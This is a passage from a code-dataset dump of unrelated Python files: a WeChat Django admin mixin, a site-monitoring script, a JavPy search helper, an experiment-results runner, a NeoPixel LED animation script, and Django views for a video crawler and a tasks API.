generic_test.generic_test_main('sunset_view.py', 'sunset_view.tsv',\n examine_buildings_with_sunset))\n","sub_path":"epi_judge_python/sunset_view.py","file_name":"sunset_view.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"195053017","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom functools import wraps\n\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom django.template.response import SimpleTemplateResponse\nfrom django.urls import reverse\nfrom django.utils.http import urlencode\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom ..admin.base import registered_admins, WeChatModelAdmin\nfrom ..models import WeChatApp\nfrom ..models.permission import get_user_permissions\nfrom ..utils.admin import get_request_params\nfrom .wechat import default_site as default_wechat_site\n\n\ndef wechat_admin_view(view, site):\n \"\"\"装饰WeChatAdmin中的view\n 在请求上附上WeChatApp实例\n 并在响应的模板上附上app,app_id等context\n \"\"\"\n @wraps(view)\n def decorated_func(request, *args, **kwargs):\n model_admin = getattr(view, \"__self__\", None)\n\n # 从请求中获取app,附在request上\n app = None\n app_id = get_request_params(request, \"app_id\")\n if app_id:\n try:\n app = site.wechat_site.app_queryset.get(id=app_id)\n except WeChatApp.DoesNotExist:\n pass\n request.app_id = app_id\n request.app = app\n\n rv = view(request, *args, **kwargs)\n\n # 更新response的context\n if isinstance(rv, SimpleTemplateResponse):\n if rv.context_data is None:\n rv.context_data = dict()\n rv.context_data.update(\n app=app,\n app_id=app_id\n )\n\n return rv\n\n return decorated_func\n\n\nclass WeChatAdminSiteMixin(object):\n \"\"\"AdminSiteMixin 自定义后台需要包含微信相关功能时 需要将本Mixin混入\"\"\"\n _default_wechat_site = default_wechat_site\n\n def __init__(self, *args, **kwargs):\n super(WeChatAdminSiteMixin, self).__init__(*args, **kwargs)\n for model, admin_class in registered_admins:\n self.register(model, admin_class)\n\n @property\n def wechat_site(self):\n \"\"\"默认微信站点,在获取app queryset时与做url reverse时需使用\n\n :rtype: wechat_django.WeChatSite\n \"\"\"\n return self._default_wechat_site\n\n def admin_view(self, view, cacheable=False):\n model_admin = getattr(view, \"__self__\", None)\n\n if isinstance(model_admin, WeChatModelAdmin):\n view = wechat_admin_view(view, self)\n\n return super(WeChatAdminSiteMixin, self).admin_view(view, cacheable)\n\n def get_urls(self):\n rv = super(WeChatAdminSiteMixin, self).get_urls()\n\n wechat_app_index = wechat_admin_view(self.wechat_index, self)\n rv += [\n url(\n r\"(?Pwechat_django)/apps/(?P\\d+)/$\",\n self.admin_view(wechat_app_index),\n name=\"wechat_funcs_list\"\n )\n ]\n\n return rv\n\n def _build_app_dict(self, request, label=None):\n rv = super(WeChatAdminSiteMixin, self)._build_app_dict(request, label)\n\n if not label:\n # 首页 追加app列表\n app_dict = self._build_wechat_app_dict(request)\n if app_dict[\"has_module_perms\"]:\n rv[\"wechat_django_apps\"] = app_dict\n elif not rv:\n pass\n elif label == \"wechat_django\":\n app_id = request.resolver_match.kwargs.get(\"app_id\")\n if app_id:\n # 公众号首页,各管理菜单\n for model in rv[\"models\"]:\n if model[\"perms\"].get(\"change\") and model.get(\"admin_url\"):\n model['admin_url'] += \"?\" + urlencode(dict(app_id=app_id))\n if model[\"perms\"].get(\"add\") and model.get(\"add_url\"):\n query = urlencode(dict(\n _changelist_filters=urlencode(dict(\n app_id=app_id\n ))\n ))\n model['add_url'] += \"?\" + query\n else:\n # 原始菜单(只有app管理)\n pass\n\n return rv\n\n def _build_wechat_app_dict(self, request):\n \"\"\"构建wechat app列表菜单\"\"\"\n query = self.wechat_site.app_queryset\n if not request.user.is_superuser:\n perms = get_user_permissions(request.user)\n allowed_apps = {\n k for k, ps in perms.items() if ps != {\"manage\"}\n }\n query = query.filter(name__in=allowed_apps)\n apps = query.all()\n app_perms = [\n dict(\n name=str(app),\n object_name=app.name,\n perms=dict(\n change=True,\n ),\n admin_url=reverse(\n 'admin:wechat_funcs_list',\n current_app=self.name,\n kwargs=dict(\n app_id=app.id,\n app_label=\"wechat_django\"\n )\n )\n )\n for app in apps\n ]\n return {\n 'name': _(\"WeChat apps\"),\n 'app_label': \"wechat_django\",\n # 'app_url': \"#\", # TODO: 修订app_url\n 'has_module_perms': bool(app_perms),\n 'models': app_perms,\n }\n\n def wechat_index(self, request, *args, **kwargs):\n \"\"\"某个公众号后台管理首页\"\"\"\n kwargs.pop(\"app_id\", None)\n return super(WeChatAdminSiteMixin, self).app_index(\n request, *args, **kwargs)\n\n\nclass WeChatAdminSite(WeChatAdminSiteMixin, admin.AdminSite):\n pass\n\n\ndef patch_admin():\n \"\"\"用当前wechat-django默认的adminsite替代django自带的默认adminsite\"\"\"\n setattr(admin.sites, \"site\", default_site)\n setattr(admin, \"site\", default_site)\n\n\ndefault_site = WeChatAdminSite()\ndefault_site._registry.update(admin.sites.site._registry)\n","sub_path":"wechat_django/sites/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":5910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"164040643","text":"import requests\nimport smtplib\n\n#python3 -m venv monitorUrl if don't have python3-venv installed then you should install it by\n#typing sudo apt install python3-venv\n#source monitorUrl/bin/activate\n#pip install requests\n#wrote by me, myself and i. Lotervik :P\n\ndef notificationMail():\n with smtplib.SMTP('smtp.gmail.com', 587) as smtp:\n smtp.ehlo()\n smtp.starttls() # crypter le traffic\n smtp.ehlo()\n\n smtp.login(adressmail, mdp)\n subject = 'Your Site is down'\n body = 'nanani nanana '\n msg = f'Subject: {subject}\\n\\n{body}'\n\n #smtp.sendmail(SENDER,RECEIVER, msg)\n smtp.sendmail(adressmail, adressmail, msg)\n\n\n\nadressmail = \"yourgmail@gmail.com\"\nmdp = \"yourmdp\"\n\ntry:\n # 5s le temps d attente , si le site ne repond pas ==> exception\n r = requests.get(\"https://www.google.com/\", timeout=5)\n if r.status_code != 200:\n # https://myaccount.google.com/lesssecureapps\n #notificationMail()\n print(\"your site is down\")\n else : print(\"mcha\")\n\nexcept Exception as e:\n #notificationMail()\n print(\"your site is down\")\n\n\n\n\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"217256901","text":"import JavPy.sources # do not remove this line\nfrom JavPy.functions.sources import Sources\nfrom JavPy.functions.actress_translate import ActressTranslate\nfrom JavPy.functions.history_names import HistoryNames\nfrom JavPy.utils.requester import submit, wait_until\nfrom JavPy.functions.actress_info import ActressInfo\nfrom JavPy.functions.datastructure import Actress\n\n\nclass SearchByActress:\n @staticmethod\n def __guess_lang(text):\n if all(map(lambda c: ord(c) < 128, text)):\n lang = \"en\"\n\n else:\n if any(map(lambda c: 0x0800 <= ord(c) <= 0x4E00, text)):\n lang = \"jp\"\n else:\n lang = \"zh\"\n\n return lang\n\n @classmethod\n def search(cls, actress, up_to, with_profile=False):\n lang = cls.__guess_lang(actress)\n\n if lang == \"en\":\n actress = ActressTranslate.translate2jp(actress)\n if actress:\n videos = [\n submit(source.search_by_actress, actress, up_to)\n for source in Sources.SearchByActress\n ]\n if with_profile:\n profile = submit(ActressInfo.get_actress_info, actress)\n names = submit(HistoryNames.get_history_names, actress)\n names = names.result()\n profile = profile.result()\n print(profile)\n if profile is None:\n profile = Actress()\n profile.other[\"history_names\"] = names\n else:\n profile.other[\"history_names\"] = list(\n set(names).union(set(profile.other[\"history_names\"]))\n )\n return wait_until(videos), profile\n else:\n return wait_until(videos), None\n\n return [], None\n\n\nif __name__ == \"__main__\":\n print(SearchByActress.search(\"桃乃木かな\", None, True))\n","sub_path":"JavPy/functions/search_by_actress.py","file_name":"search_by_actress.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"457086395","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 13 07:21:10 2021\n\n@author: Rudra\n\"\"\"\n\nimport os\nimport sys\nimport pickle\nimport pprint\nimport argparse\n\n\ndef join_str(*args):\n out_str = ''\n for idx, ele in enumerate(args):\n str_add = ele\n if idx != (len(args)-1):\n str_add += '_'\n out_str += str_add\n return out_str\n\n\nsys.path.append('..')\n\ndefault_repo = '/home/rsk3900/Documents/Python_Scripts/multiset_gaze/src'\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--path_exp_tree',\n default='/results/test_results_blank_folders',\n help='path to create blank test results folder',\n type=str)\nparser.add_argument('--path_results',\n default='/results',\n help='path to all experiments results')\nparser.add_argument('--mode', type=str, default='one_vs_one',\n help='mode you want to test out')\nparser.add_argument('--path_acc_results',\n default='/results/multiset_accumulated_results',\n help='path to accumulate all results',\n type=str)\nparser.add_argument('--path_data',\n default='/data/datasets/All',\n help='path to all H5 file data',\n type=str)\nparser.add_argument('--exp_cond',\n default='AUG-1_GRADREV-0_UNCERTAIN-1_ADA_IN_NORM-0_IN_NORM-1',\n help='exact exp condition you want results for',\n type=str)\nparser.add_argument('--local_rank', type=int, default=0,\n help='rank to set GPU')\nparser.add_argument('--batch_size', type=int, default=32,\n help='testing batchsize')\nparser.add_argument('--repo_root', type=str,\n default=default_repo,\n help='path to repo root')\nparser.add_argument('--save_test_maps',\n action='store_true',\n help='save out test maps')\n\nargs = parser.parse_args()\nargs = vars(args)\npprint.pprint(args)\n\nDS_selections = pickle.load(open('./cur_objs/dataset_selections.pkl', 'rb'))\nDS_present = list(DS_selections['train'].keys())\n\ntrain_itr_list = ['all_vs_one'] if args['mode'] == 'all_vs_one' else DS_present\n\nfor train_ds in train_itr_list:\n for test_ds in DS_present:\n\n print('----------------------')\n print('Mode: {}'.format(args['mode']))\n print('Trained on: {}'.format(train_ds))\n print('Test on: {}'.format(test_ds))\n\n exp_name = join_str('RESULT',\n args['mode'],\n 'TRAIN',\n train_ds,\n 'TEST',\n test_ds,\n args['exp_cond'])\n\n path_to_find_model = os.path.join(args['path_results'],\n args['mode'],\n args['exp_cond'],\n )\n\n possible_paths = []\n for path in os.listdir(path_to_find_model):\n if (train_ds in path):\n possible_paths.append(path)\n\n assert len(possible_paths) <= 1, 'only one such model must exist'\n\n if (possible_paths):\n path_model = os.path.join(path_to_find_model,\n possible_paths[0],\n 'results',\n 'best_model.pt')\n\n path_acc_results = os.path.join(args['path_acc_results'],\n args['mode'],\n args['exp_cond'])\n\n run_cmd = 'python run.py '\n run_cmd += '--repo_root=%s ' % args['repo_root']\n run_cmd += '--path_data=%s ' % args['path_data']\n run_cmd += '--path_model=%s ' % path_model\n run_cmd += '--cur_obj=%s ' % test_ds # Set test cur obj\n run_cmd += '--path_exp_tree=%s ' % args['path_exp_tree']\n run_cmd += '--save_results_here=%s ' % (path_acc_results+'/'+exp_name+'.pkl')\n run_cmd += '--exp_name=%s ' % exp_name\n run_cmd += '--local_rank=%d ' % args['local_rank']\n run_cmd += '--batch_size=%d ' % args['batch_size']\n run_cmd += '--workers=4 '\n run_cmd += '--only_test=1 '\n run_cmd += '--use_instance_norm=1 '\n run_cmd += '--use_ada_instance_norm=0 '\n\n if not os.path.exists(path_acc_results+'/'+exp_name+'.pkl'):\n os.system(run_cmd)\n else:\n print('DONE!')\n print(run_cmd)\n","sub_path":"ritnet/Ellseg_v2/accumulate_results.py","file_name":"accumulate_results.py","file_ext":"py","file_size_in_byte":4684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"642405696","text":"\n\n#calss header\nclass _RECAST():\n\tdef __init__(self,): \n\t\tself.name = \"RECAST\"\n\t\tself.definitions = [u'to change the form of something, or to change an actor in a play or film: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_recast.py","file_name":"_recast.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"250805992","text":"#########################################\n# NeoPixel.py\n# more info @: http://myrobotlab.org/service/NeoPixel\n#########################################\n\n#http://myrobotlab.org/service/NeoPixel\n#Submitted by calamity on Fri, 07/29/2016 - 15:39\n#The Neo Pixel are chainable, addressable leds hardware that can be controlled using only one signal wire.\n#The NeoPixel service allow you to connect and control an Neo Pixel hardware connected to an Arduino with MRL\n\n#Setup: \n#The NeoPixel hardware can connect to any pins on the arduino board, including analog pins\n#Note: Neopicel hardware can draw a lot of power (60mA for each pixels at full brightness). \n#If you are running big NeoPixel hardware, you should power it with external power source instead of the Arduino.\n\n \n# virtual = True\nport = \"COM7\"\n#port = \"/dev/ttyUSB0\"\n# optional but recommended neopixel connected on a dedicated arduino\nrxtxPort = \"Serial2\"\n \n# start optional virtual arduino service, used for internal test\nif ('virtual' in globals() and virtual):\n virtualArduino = Runtime.start(\"virtualArduino\", \"VirtualArduino\")\n virtualArduino.connect(port)\n# end used for internal test\n \n#Starting Arduino Service\narduino = Runtime.start(\"arduino\",\"Arduino\")\narduino.setBoardNano() #or setBoardMega() or arduino.setBoardUno() or .setBoardNano()\narduino.connect(port)\n \n#Starting NeoPixel Service\nneopixel = Runtime.start(\"neopixel\",\"NeoPixel\")\nneopixel.attach(arduino, 2, 24)\n \n#neopixel.attach(arduino, pin, number of pixel)\n#if ('virtual' in globals() and virtual):\n# #Attach Neopixel to main arduino\n# neopixel.attach(arduino, 2, 24)\n#else:\n# #Starting optional RX/TX connected slave arduino and Attach Neopixel to slave arduino\n# arduinoNano = Runtime.start(\"arduinoNano\",\"Arduino\")\n# arduinoNano.setBoardNano() #or arduino.setBoardUno()\n# arduinoNano.connect(arduino,rxtxPort)\n# neopixel.attach(arduinoNano, 2, 24)\n \n \n#Animations;\n#\"Color Wipe\"\n#\"Larson Scanner\"\n#\"Theater Chase\"\n#\"Theater Chase Rainbow\"\n#\"Rainbow\"\n#\"Rainbow Cycle\"\n#\"Flash Random\"\n#\"Ironman\"\n \n#speed: 1-65535 1=full speed, 2=2x slower than 1, 10=10x slower than 1\n#starting a animation\n#neopixel.setAnimation(\"Animation Name\", red, green, blue, speed)\n#neopixel.setAnimation(\"Theater Chase\", 255, 0, 0, 1) #running Theater Chase with color red at full speed\n\ndef lightupthering():\n\tneopixel.setAnimation(\"Theater Chase Rainbow\", 0, 0, 255, 1) #running Theater Chase with color red at full speed\n\tsleep(10)\n\tneopixel.animationStop()\n\tneopixel.setAnimation(\"Color Wipe\", 0, 0, 255, 1) #running Theater Chase with color red at full speed\n\tsleep(10)\n\tneopixel.animationStop()\n\tneopixel.setAnimation(\"Larson Scanner\", 0, 0, 255, 1) #running Theater Chase with color red at full speed\n\tsleep(10)\n\tneopixel.animationStop()\n\tneopixel.setAnimation(\"Theater Chase\", 0, 0, 255, 1) #running Theater Chase with color red at full speed\n\tsleep(10)\n\tneopixel.animationStop()\n\tneopixel.setAnimation(\"Rainbow\", 0, 0, 255, 1) #running Theater Chase with color red at full speed\n\tsleep(10)\n\tneopixel.animationStop()\n\tneopixel.setAnimation(\"Rainbow Cycle\", 0, 0, 255, 1) #running Theater Chase with color red at full speed\n\tsleep(10)\n\tneopixel.animationStop()\n\tneopixel.setAnimation(\"Flash Random\", 0, 0, 255, 1) #running Theater Chase with color red at full speed\n\tsleep(10)\n\tneopixel.animationStop()\n\tneopixel.setAnimation(\"Ironman\", 0, 0, 255, 1) #running Theater Chase with color red at full speed\n\tsleep(10)\n\tneopixel.animationStop()\n \n\t#run an animation with python script\n\t#turn off all the pixels\n\tfor pixel in range (1,neopixel.numPixel + 1):\n \t\tneopixel.setPixel(pixel, 0, 0, 0) #setPixel(pixel, red, green, blue)\n\tneopixel.writeMatrix() #send the pixel data to the Neopixel hardware \n\n\tfor loop in range(0,10): #do 10 loop\n\t \tfor pixel in range(1, neopixel.numPixel +1):\n \t\t\tneopixel.setPixel(pixel, 255, 0, 0) #set the pixel to red \n \t\t\tneopixel.writeMatrix()\n \t\t\tsleep(0.03) #give a bit of delay before next step\n \t\t\tneopixel.setPixel(pixel, 0, 0, 0) #turn off the pixel\n\tneopixel.writeMatrix()\n\n\tfor pixel in range (1,neopixel.numPixel + 1):\n \t\tneopixel.setPixel(pixel, 0, 0, 0) #setPixel(pixel, red, green, blue)\n\tneopixel.writeMatrix() #send the pixel data to the Neopixel hardware \n\n\tfor loop in range(0,10): #do 10 loop\n \t\tfor pixel in range(1, neopixel.numPixel +1):\n \t\t\tneopixel.setPixel(pixel, 0, 255, 0) #set the pixel to green \n \t\t\tneopixel.writeMatrix()\n \t\t\tsleep(0.03) #give a bit of delay before next step\n \t\t\tneopixel.setPixel(pixel, 0, 0, 0) #turn off the pixel\n\tneopixel.writeMatrix()\n\n\tfor pixel in range (1,neopixel.numPixel + 1):\n \t\tneopixel.setPixel(pixel, 0, 0, 0) #setPixel(pixel, red, green, blue)\n\tneopixel.writeMatrix() #send the pixel data to the Neopixel hardware \n\n\n\tfor loop in range(0,10): #do 10 loop\n \t\tfor pixel in range(1, neopixel.numPixel +1):\n\t \t\tneopixel.setPixel(pixel, 0, 0, 255) #set the pixel to blue \n \t\t\tneopixel.writeMatrix()\n \t\t\tsleep(0.03) #give a bit of delay before next step\n \t\t\tneopixel.setPixel(pixel, 0, 0, 0) #turn off the pixel\n\tneopixel.writeMatrix()\n\nfor loop in range(0,5):\n\tprint (\"loop \"+str(loop))\n\tlightupthering()\n","sub_path":"home/hairygael/NeoPixelTest.py","file_name":"NeoPixelTest.py","file_ext":"py","file_size_in_byte":5171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"70327526","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom .models import *\nfrom .forms import *\nfrom django.views import generic\nfrom django.urls import reverse\nfrom django.contrib.auth import login, authenticate, logout\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom crawlerapp.tasks import *\nfrom crawlerapp.filters import *\nimport jsonpickle, io, ast, csv, os, json, random, datetime\nfrom crawlerapp.definitions import *\nfrom crawlerapp.utils import job_update, get_celery_worker_status\nfrom django.utils import timezone\nimport tarfile,re\n\ndef home(request):\n return render(request, 'crawlerapp/landing.html')\n\ndef mobile(request):\n return render(request, 'crawlerapp/mobile.html')\n\n@login_required\n@permission_required('crawlerapp.can_crawl', raise_exception=True)\ndef all(request):\n if not request.user.is_authenticated:\n return HttpResponseRedirect('/accounts/login/')\n jobs = Job.objects.order_by('-id')\n context = {'jobs': jobs}\n return render(request,'crawlerapp/all.html',context)\n\n\n@login_required\n@permission_required('crawlerapp.can_crawl', raise_exception=True)\ndef dataset_all(request):\n if not request.user.is_authenticated:\n return HttpResponseRedirect('/accounts/login/')\n\n datasets = Dataset.objects.order_by('-id')\n context = {'datasets': datasets}\n\n return render(request,'crawlerapp/dataset_all.html',context)\n\n\n@login_required\n@permission_required('crawlerapp.can_crawl', raise_exception=True)\ndef detail(request, job_id):\n context = job_update(job_id)\n filters = context[\"filters\"]\n if request.method == \"POST\":\n form = DownloadForm(request.POST)\n if request.POST.get(\"filter\"):\n job = Job.objects.filter(id=job_id).get()\n\n filter_name = str(request.POST.get(\"filter\"))\n filter_obj = filters[filter_name][\"filter_obj\"]\n filters[filter_obj.name()][\"enabled\"] = False\n\n job.filters[filter_name] = \"Active\"\n job.save()\n\n filter_async.delay(jsonpickle.encode(filter_obj), job_id)\n elif request.POST.get(\"remove\"):\n filter_name = str(request.POST.get(\"remove\"))\n filter_obj = filters[filter_name][\"filter_obj\"]\n #Dont clear the filters asynchronously\n clear_filter_async(jsonpickle.encode(filter_obj), job_id)\n elif request.POST.get(\"delete_job\"):\n job = Job.objects.filter(id=job_id).get()\n job.deleteJob()\n return redirect('all')\n elif request.POST.get(\"restart_crawl\"):\n #Refresh job\n job = Job.objects.filter(id=job_id).get()\n job.executed = False\n job.download_finished = False\n job.work_status = \"Restarting crawl...\"\n job.save()\n crawl_async.delay(job.id)\n\n return redirect('detail', job_id)\n else:\n form = DownloadForm()\n context['form'] = form\n return render(request, 'crawlerapp/detail.html', context)\n\n@login_required\n@permission_required('crawlerapp.can_crawl', raise_exception=True)\ndef view_videos(request, job_id):\n face_detected = {}\n job = Job.objects.filter(id=job_id).get()\n for vid in job.videos:\n vid_query = Video.objects.filter(id=vid).get()\n if \"Face Detection\" in vid_query.filters:\n if vid_query.filters['Face Detection']:\n face_detected[vid] = vid_query\n context = {\n 'face_detected': face_detected\n }\n return render(request,'crawlerapp/view_videos.html',context)\n\n\ndef newcsv(data, csvheader, fieldnames):\n \"\"\"\n Create a new csv file that represents generated data.\n \"\"\"\n csvrow = []\n new_csvfile = io.StringIO()\n wr = csv.writer(new_csvfile, quoting=csv.QUOTE_ALL)\n wr.writerow([csvheader])\n wr = csv.DictWriter(new_csvfile, fieldnames = fieldnames)\n\n for job in data:\n wr.writerow(job.videos)\n\n return new_csvfile\n\n\n@login_required\n@permission_required('crawlerapp.can_crawl', raise_exception=True)\ndef dataset_detail(request, dataset_id):\n try:\n dataset = Dataset.objects.filter(id=dataset_id).get()\n except:\n return render(request, 'crawlerapp/datasetnotfound.html', {'datasetid': dataset_id})\n #get list of jobs\n video_sum = 0\n job_object_list = []\n for job_id in dataset.jobs_list:\n job = Job.objects.filter(id=job_id).get()\n job_object_list.append(job)\n for vid in job.videos:\n vid_query = Video.objects.filter(id=vid).get()\n if vid_query.download_success:\n video_sum += 1\n context = {'dataset_name': dataset.name,\n 'dataset_num_vids': video_sum,\n 'dataset_num_jobs': len(dataset.jobs_list),\n 'dataset_created_date': dataset.created_date,\n 'dataset_user_id': dataset.user_id,\n 'dataset_id': dataset.id,\n 'dataset_jobs': job_object_list}\n if request.method == \"POST\":\n if request.POST.get(\"submit_jobs\"):\n form = ChangeDatasetJobs(request.user,dataset,request.POST)\n if form.is_valid():\n dataset.jobs_list = form.cleaned_data['jobs_list']\n dataset.save()\n return redirect('dataset-detail', dataset.id)\n elif request.POST.get(\"download\"):\n # Create the HttpResponse object with the appropriate CSV header.\n #redir_url = 'crawlerapp/dataset/' + str(dataset.id)\n #response = HttpResponseRedirect('',content_type='text/csv')\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = 'attachment; filename=' + dataset.name + '.csv'\n fieldnames = ['job_id', 'job_name', 'query', 'video_ids']\n writer = csv.DictWriter(response, fieldnames = fieldnames)\n for job in job_list:\n writer.writerow({'job_id': job.id, 'job_name': job.name, 'query': job.query, 'video_ids': job.videos})\n return response\n elif request.POST.get(\"download_hdf5\"):\n p2fa_list = []\n for job_id in dataset.jobs_list:\n job = Job.objects.filter(id=job_id).get()\n for vid in job.videos:\n vid_query = Video.objects.filter(id=vid).get()\n if 'P2FA Align Video' in vid_query.filters:\n if vid_query.filters['P2FA Align Video']:\n p2fa_list.append(vid_query.id)\n collect.delay(p2fa_list,dataset.id)\n return redirect('dataset-detail', dataset.id)\n\n else:\n form = ChangeDatasetJobs(request.user,dataset)\n context['form'] = form\n return render(request, 'crawlerapp/dataset_detail.html', context)\n\n\ndef index(request):\n if not (request.user.is_authenticated):\n return HttpResponseRedirect('/accounts/login/')\n jobs = Job.objects.all()\n context = {'jobs': jobs}\n return render(request, 'crawlerapp/index.html', context)\n\n\n@login_required\n@permission_required('crawlerapp.can_crawl', raise_exception=True)\ndef job_create(request):\n if not (request.user.is_authenticated):\n return HttpResponseRedirect('/accounts/login/')\n if request.method == \"POST\":\n form = CreateJobForm(request.POST)\n if form.is_valid():\n job = Job()\n job.language = form.cleaned_data['language']\n job.region = form.cleaned_data['region']\n job.name = form.cleaned_data['name']\n job.channel_id = form.cleaned_data['channel_id']\n job.query = form.cleaned_data['query']\n job.ordering = form.cleaned_data['ordering']\n job.safe_search = form.cleaned_data['safe_search']\n job.cc_enabled = form.cleaned_data['cc']\n job.video_def = form.cleaned_data['video_def']\n job.video_duration = form.cleaned_data['video_duration']\n job.created_date = timezone.now()\n job.num_pages = form.cleaned_data['num_vids']\n job.num_vids = 0\n job.user_id = request.user.username\n job.save()\n crawl_async.delay(str(job.id))\n return redirect('detail', job.id)\n else:\n form = CreateJobForm()\n\n return render(request, 'crawlerapp/job_create.html', {'form': form})\n\n\n@login_required\n@permission_required('crawlerapp.can_crawl', raise_exception=True)\ndef dataset_create(request):\n if not (request.user.is_authenticated):\n return HttpResponseRedirect('/accounts/login/')\n if request.method == \"POST\":\n form = CreateDatasetForm(request.user,request.POST)\n if form.is_valid():\n dataset = Dataset()\n dataset.jobs_list = list(form.cleaned_data['jobs_list'])\n dataset.name = form.cleaned_data['name']\n dataset.description = form.cleaned_data['description']\n dataset.created_date = timezone.now()\n dataset.user_id = request.user.username\n dataset.save()\n return redirect('dataset-detail', dataset.id)\n else:\n form = CreateDatasetForm(request.user)\n\n return render(request, 'crawlerapp/dataset_create.html', {'form': form})\n\ndef signup(request):\n if request.method == 'POST':\n form = SignUpForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n raw_password = form.cleaned_data.get('password1')\n user = authenticate(username=username, password=raw_password)\n login(request, user)\n return redirect(home)\n else:\n form = SignUpForm()\n return render(request, 'registration/signup.html', {'form': form})\n\n\n@login_required\ndef profile(request):\n jobs = Job.objects.filter(user_id=request.user.username)\n datasets = Dataset.objects.filter(user_id=request.user.username)\n context = {'jobs': jobs, 'datasets': datasets, 'user': request.user}\n return render(request, 'crawlerapp/profile.html', context)\n\n\ndef updateProgress(request, job_id):\n #Can't encode filter object as json, have to get rid of it\n context = job_update(job_id)\n filters = context[\"filters\"]\n for filter_name,filter_dict in filters.items():\n filter_dict[\"filter_obj\"] = None\n\n\n return HttpResponse(json.dumps(context), content_type='application/json')\n\n@login_required\ndef celery_status(request):\n d = get_celery_worker_status()\n context = {'celery_status': d}\n return render(request, 'crawlerapp/celery_status.html', context)\n\n@login_required\ndef upload(request):\n if request.method == 'POST':\n form = DocumentForm(request.POST, request.FILES)\n fname = request.FILES['document'].name\n if (form.is_valid() and fname.endswith(\"tar\")):\n doc = form.save()\n with tarfile.open(str(doc.document), \"r\") as tar:\n all_dirs = [f for f in tar.getmembers() if f.isdir() and f.name.count(\"/\") == 0]\n for member in all_dirs:\n #Check if we've gotten this video already\n found = Video.objects.filter(id=str(member.name)).count()\n if (found > 0):\n print(\"Already have \" + str(member.name))\n else:\n reg_vtt = re.compile(\".*.vtt\")\n #If not, check to make sure it's properly formatted\n all_relevant_files = [f.name for f in tar.getmembers() if f.name.startswith(member.name)]\n has_mp4 = (member.name + \"/\" + member.name + \".mp4\" in all_relevant_files)\n has_wav = (member.name + \"/\" + member.name + \".wav\" in all_relevant_files)\n vtts = list(filter(reg_vtt.match,all_relevant_files))\n try:\n lang = vtts[0].split(\".\")[1]\n except Exception as e:\n #Couldn't find a language...\n continue\n has_frames = (member.name + \"/Frames\" in all_relevant_files)\n has_align = (member.name + \"/AlignFilter\" in all_relevant_files)\n if (has_mp4 and has_wav):\n video = Video(id=str(member.name))\n video.cc_enabled = True\n video.language = lang\n video.search_time = timezone.now()\n video.audio_extracted = has_wav\n video.download_success = True\n video.download_time = timezone.now()\n video.download_path = os.path.join(CRAWLED_VIDEOS_DIR, member.name)\n if has_frames:\n video.filters['Extract Frames'] = True\n if has_align:\n video.filters['P2FA Align Video'] = True\n video.save()\n tar.extractall(path=CRAWLED_VIDEOS_DIR,members=[f for f in tar.getmembers() if f.name.startswith(member.name)])\n\n\n return redirect('home')\n else:\n form = DocumentForm()\n return render(request, 'crawlerapp/upload.html', {\n 'form': form\n })\n","sub_path":"crawlerapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"583904688","text":"from django.views.generic import View\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import authentication, permissions\n\nfrom apps.dashboard.models import *\nfrom apps.api.v1.tasks.serializers import *\n \nfrom datetime import datetime, timedelta\nfrom django.db.models import Q\n\n# Class based view for alerts\nclass APITasks(APIView):\n # this will be executed ONLY on GET request.\n def get(self, request, format=None):\n\n try:\n\n # need to get logged in user.\n user_profile = request.user.core_user_profile\n tasks = CoreTasks.objects.filter(user=request.user, date_deativated=None, task_cleared_id=0).order_by('-date_due')\n tasks_data = TaskSerializer(tasks, context={'request': request})\n \n except:\n \n tasks = None \n tasks_data = TaskSerializer(tasks)\n\n tzCode = get_user_timezone_code(request.user)\n \n # finalizing our output content.\n content = {\n # this node will have all organization related data\n 'tasks': tasks_data.data, \n 'tzCode': tzCode,\n 'user': request.user.id\n }\n\n # sending final response.\n return Response(content)\n \n def post(self, request, format=None):\n \n method = self.request.DATA.get('method', None)\n task_id = self.request.DATA.get('task_id', None)\n completed = self.request.DATA.get('completed', None) \n description = self.request.DATA.get('description', None)\n due_date = self.request.DATA.get('due_date', None)\n \n if method == 'add':\n if due_date is not None and due_date != '':\n due_datetime = datetime.strptime(due_date, '%m/%d/%Y')\n task = CoreTasks.objects.create(user=request.user,\n tasks_description=description,\n date_added=datetime.now(),\n date_due=due_datetime,\n assigned_by_user=request.user,\n user_ip_address=get_client_ip(request), \n )\n else:\n due_datetime = None\n task = CoreTasks.objects.create(user=request.user,\n tasks_description=description,\n date_added=datetime.now(),\n user_ip_address=get_client_ip(request), \n ) \n \n task.save()\n task_data = TaskSerializer(task, context={'request': request})\n content = { # sending success response\n 'status': 'success', 